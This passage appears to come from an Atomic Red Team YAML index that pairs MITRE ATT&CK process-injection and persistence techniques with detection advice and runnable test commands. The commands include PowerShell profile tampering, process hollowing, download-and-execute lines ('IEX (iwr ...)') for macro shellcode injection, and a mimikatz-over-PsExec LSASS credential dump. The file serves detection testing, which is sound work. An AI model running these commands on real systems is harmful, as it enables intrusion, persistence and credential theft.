attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662 + description: "Adversaries may inject portable executables (PE) into processes + in order to evade process-based defenses as well as possibly elevate privileges. + PE injection is a method of executing arbitrary code in the address space + of a separate live process. 
\n\nPE injection is commonly performed by copying + code (perhaps without a file on disk) into the virtual address space of the + target process before invoking it via a new thread. The write can be performed + with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, + then invoked with CreateRemoteThread or additional code (ex: + shellcode). The displacement of the injected code does introduce the additional + requirement for functionality to remap memory references. (Citation: Elastic + Process Injection July 2017) \n\nRunning code in the context of another process + may allow access to the process's memory, system/network resources, and possibly + elevated privileges. Execution via PE injection may also evade detection from + security products since the execution is masked under a legitimate process. " + name: Portable Executable Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.002 + url: https://attack.mitre.org/techniques/T1055/002 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. 
Windows API calls + such as CreateRemoteThread and those that can be used to modify + memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + atomic_tests: [] + T1546.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.013 + url: https://attack.mitre.org/techniques/T1546/013 + - source_name: Microsoft About Profiles + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6 + description: Microsoft. (2017, November 29). About Profiles. Retrieved June + 14, 2019. + - source_name: ESET Turla PowerShell May 2019 + url: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + description: Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell + usage. Retrieved June 14, 2019. + - source_name: Wits End and Shady PowerShell Profiles + url: https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html + description: 'DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege + Elevation using the Powershell Profile. Retrieved July 8, 2019.' + - url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf + description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING + CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016. 
+ source_name: Malware Archaeology PowerShell Cheat Sheet + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell Profile + description: "Adversaries may gain persistence and elevate privileges by executing + malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) + is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) + starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://attack.mitre.org/techniques/T1059/001) + supports several profiles depending on the user or host program. For example, + there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) + host programs such as the PowerShell console, PowerShell ISE or Visual Studio + Code. An administrator can also configure a profile that applies to all users + and host programs on the local computer. (Citation: Microsoft About Profiles) + \n\nAdversaries may modify these profiles to include arbitrary commands, functions, + modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) + drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) + session the modified script will be executed unless the -NoProfile + flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) + \n\nAn adversary may also be able to escalate privileges if a script in a + PowerShell profile is loaded and executed by an account with higher privileges, + such as a domain administrator. 
(Citation: Wits End and Shady PowerShell Profiles)" + id: attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:31:31.082Z' + created: '2020-01-24T15:11:02.758Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: + + * $PsHome\Profile.ps1 + * $PsHome\Microsoft.{HostProgram}_profile.ps1 + * $Home\My Documents\PowerShell\Profile.ps1 + * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 + + Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Allen DeRyke, ICE + x_mitre_platforms: + - Windows + identifier: T1546.013 + atomic_tests: + - name: Append malicious start-process cmdlet + auto_generated_guid: '090e5aa5-32b6-473b-a49b-21e843a56896' + description: 'Appends a start process cmdlet to the current user''s powershell + profile pofile that points to a malicious executable. Upon execution, calc.exe + will be launched. 
+ +' + supported_platforms: + - windows + input_arguments: + exe_path: + description: Path the malicious executable + type: Path + default: calc.exe + ps_profile: + description: Powershell profile to use + type: String + default: "$profile" + dependency_executor_name: powershell + dependencies: + - description: 'Ensure a powershell profile exists for the current user + +' + prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} + +' + get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force + +' + executor: + command: | + Add-Content #{ps_profile} -Value "" + Add-Content #{ps_profile} -Value "Start-Process #{exe_path}" + powershell -Command exit + cleanup_command: | + $oldprofile = cat $profile | Select-Object -skiplast 1 + Set-Content $profile -Value $oldprofile + name: powershell + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. 
A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. 
Print processors that do not correlate with known good software or patching may be suspicious. + x_mitre_data_sources: + - 'File: File Creation' + - 'Process: OS API Execution' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] + T1055.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.009 + url: https://attack.mitre.org/techniques/T1055/009 + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - source_name: GDS Linux Injection + url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html + description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code + Injection Without Ptrace(2). Retrieved February 21, 2020. + - source_name: DD Man + url: http://man7.org/linux/man-pages/man1/dd.1.html + description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved + February 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Proc Memory + description: "Adversaries may inject malicious code into processes via the /proc + filesystem in order to evade process-based defenses as well as possibly elevate + privileges. Proc memory injection is a method of executing arbitrary code + in the address space of a separate live process. \n\nProc memory injection + involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) + then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. + Each running process has its own directory, which includes memory mappings. 
+ Proc memory injection is commonly performed by overwriting the target processes’ + stack using memory mappings provided by the /proc filesystem. This information + can be used to enumerate offsets (including the stack) and gadgets (or instructions + within the program that can be used to build a malicious payload) otherwise + hidden by process memory protections such as address space layout randomization + (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps + can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux + Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker + Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate + a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + proc memory injection may target child processes (such as a backgrounded copy + of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context + of another process may allow access to the process's memory, system/network + resources, and possibly elevated privileges. Execution via proc memory injection + may also evade detection from security products since the execution is masked + under a legitimate process. " + id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-06-20T22:25:55.331Z' + created: '2020-01-14T01:34:10.588Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'File: File Modification' + x_mitre_detection: "File system monitoring can determine if /proc files are + being modified. Users should not have permission to modify these in most cases. 
+ \n\nAnalyze process behavior to determine if a process is performing actions + it usually does not, such as opening network connections, reading files, or + other suspicious actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + atomic_tests: [] + T1055.013: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.013 + url: https://attack.mitre.org/techniques/T1055/013 + - url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx + description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December + 20, 2017. + source_name: Microsoft TxF + - url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx + description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, + 2017. + source_name: Microsoft Basic TxF Concepts + - url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx + description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved + December 20, 2017. + source_name: Microsoft Where to use TxF + - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf + description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: + Process Doppelgänging. Retrieved December 20, 2017.' + source_name: BlackHat Process Doppelgänging Dec 2017 + - url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ + description: hasherezade. (2017, December 18). Process Doppelgänging – a new + way to impersonate a process. Retrieved December 20, 2017. + source_name: hasherezade Process Doppelgänging Dec 2017 + - url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx + description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved + December 20, 2017. 
+ source_name: Microsoft PsSetCreateProcessNotifyRoutine routine + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Doppelgänging + description: "Adversaries may inject malicious code into process via process + doppelgänging in order to evade process-based defenses as well as possibly + elevate privileges. Process doppelgänging is a method of executing arbitrary + code in the address space of a separate live process. \n\nWindows Transactional + NTFS (TxF) was introduced in Vista as a method to perform safe file operations. + (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted + handle to write to a file at a given time. Until the write handle transaction + is terminated, all other handles are isolated from the writer and may only + read the committed version of the file that existed at the time the handle + was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, + TxF performs an automatic rollback if the system or application fails during + a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, + the TxF application programming interface (API) is still enabled as of Windows + 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may + abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). + Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), + process doppelgänging involves replacing the memory of a legitimate process, + enabling the veiled execution of malicious code that may evade defenses and + detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored + API functions such as NtUnmapViewOfSection, VirtualProtectEx, + and SetThreadContext. 
(Citation: BlackHat Process Doppelgänging + Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat + Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction + using a legitimate executable then overwrite the file with malicious code. + These changes will be isolated and only visible within the context of the + transaction.\n* Load – Create a shared section of memory and load the malicious + executable.\n* Rollback – Undo changes to original executable, effectively + removing malicious code from the file system.\n* Animate – Create a process + from the tainted section of memory and initiate execution.\n\nThis behavior + will likely not result in elevated privileges since the injected process was + spawned from (and thus inherits the security context) of the injecting process. + However, execution via process doppelgänging may evade detection from security + products since the execution is masked under a legitimate process. " + id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T15:43:48.848Z' + created: '2020-01-14T17:19:50.978Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'File: File Metadata' + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: |- + Monitor and analyze calls to CreateTransaction, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. 
(Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017) + + Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017) + + Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1055.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.012 + url: https://attack.mitre.org/techniques/T1055/012 + - url: http://www.autosectools.com/process-hollowing.pdf + description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, + 2014. + source_name: Leitch Hollowing + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Process Hollowing + description: "Adversaries may inject malicious code into suspended and hollowed + processes in order to evade process-based defenses. 
Process hollowing is a + method of executing arbitrary code in the address space of a separate live + process. \n\nProcess hollowing is commonly performed by creating a process + in a suspended state then unmapping/hollowing its memory, which can then be + replaced with malicious code. A victim process can be created with native + Windows API calls such as CreateProcess, which includes a flag + to suspend the processes primary thread. At this point the process can be + unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection + \ before being written to, realigned to the injected code, and resumed via + VirtualAllocEx, WriteProcessMemory, SetThreadContext, + then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: + Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local + Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new + process rather than targeting an existing process. This behavior will likely + not result in elevated privileges since the injected process was spawned from + (and thus inherits the security context) of the injecting process. However, + execution via process hollowing may also evade detection from security products + since the execution is masked under a legitimate process. 
" + id: attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:31.031Z' + created: '2020-01-14T17:21:54.470Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.012 + atomic_tests: + - name: Process Hollowing using PowerShell + auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c + description: | + This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. 
+ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) + supported_platforms: + - windows + input_arguments: + hollow_binary_path: + description: Path of the binary to hollow (executable that will run inside + the sponsor) + type: string + default: C:\Windows\System32\cmd.exe + parent_process_name: + description: Name of the parent process + type: string + default: explorer + sponsor_binary_path: + description: Path of the sponsor binary (executable that will host the binary) + type: string + default: C:\Windows\System32\notepad.exe + spawnto_process_name: + description: Name of the process to spawn + type: string + default: notepad + executor: + command: | + . $PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1 + $ppid=Get-Process #{parent_process_name} | select -expand id + Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose + cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction + Ignore + +' + name: powershell + - name: RunPE via VBA + auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + description: 'This module executes notepad.exe from within the WINWORD.EXE process + +' + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) 
\nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" + name: powershell + T1055: + technique: + created: '2017-05-31T21:30:47.843Z' + modified: '2021-02-09T15:43:50.029Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055 + url: https://attack.mitre.org/techniques/T1055 + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: + Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved + December 20, 2017.' + source_name: ArtOfMemoryForensics + - url: https://www.gnu.org/software/acct/ + description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved + December 20, 2017. + source_name: GNU Acct + - url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing + description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - + Chapter 7 - System Auditing. Retrieved December 20, 2017. + source_name: RHEL auditd + - url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html + description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. + Retrieved December 20, 2017. 
+ source_name: Chokepoint preload rootkits + - url: https://docs.microsoft.com/sysinternals/downloads/sysmon + description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved + December 13, 2017. + source_name: Microsoft Sysmon v6 May 2017 + description: "Adversaries may inject code into processes in order to evade process-based + defenses as well as possibly elevate privileges. Process injection is a method + of executing arbitrary code in the address space of a separate live process. + Running code in the context of another process may allow access to the process's + memory, system/network resources, and possibly elevated privileges. Execution + via process injection may also evade detection from security products since + the execution is masked under a legitimate process. \n\nThere are many different + ways to inject code into a process, many of which abuse legitimate functionalities. + These implementations exist for every major OS but are typically platform + specific. \n\nMore sophisticated samples may perform multiple process injections + to segment modules and further evade detection, utilizing named pipes or other + inter-process communication (IPC) mechanisms as a communication channel. 
" + name: Process Injection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + - Christiaan Beek, @ChristiaanBeek + - Ryan Becwar + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Metadata' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + QueueUserAPC/NtQueueApcThread, and those that can + be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017) + \n\nMonitor DLL/PE file events, specifically creation of these binary files + as well as the loading of DLLs into processes. Look for DLLs that are not + recognized or not normally loaded into a process. 
\n\nMonitoring for Linux + specific calls such as the ptrace system call should not generate large amounts + of data due to their specialized nature, and can be a very effective method + to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) + \ (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload + rootkits) \n\nMonitor for named pipe creation and connection events (Event + IDs 17 and 18) for possible indicators of infected processes with external + modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior + to determine if a process is performing actions it usually does not, such + as opening network connections, reading files, or other suspicious actions + that could relate to post-compromise behavior. " + x_mitre_platforms: + - Linux + - macOS + - Windows + identifier: T1055 + atomic_tests: + - name: Shellcode execution via VBA + auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + description: | + This module injects shellcode into a newly created process and executes. By default the shellcode is created, + with Metasploit, for use on x86-64 Windows 10 machines. + + Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office + is required. 
+ supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'The 64-bit version of Microsoft Office must be installed + +' + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) + manually to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" + name: powershell + - name: Remote Process Injection in LSASS via mimikatz + auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 + description: | + Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). + It must be executed in the context of a user who is privileged on remote `machine`. 
+ + The effect of `/inject` is explained in + supported_platforms: + - windows + input_arguments: + machine: + description: machine to target (via psexec) + type: string + default: DC1 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force + executor: + command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa + /inject /id:500" "exit" + +' + name: command_prompt + elevation_required: false + T1055.008: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.008 + url: https://attack.mitre.org/techniques/T1055/008 + - 
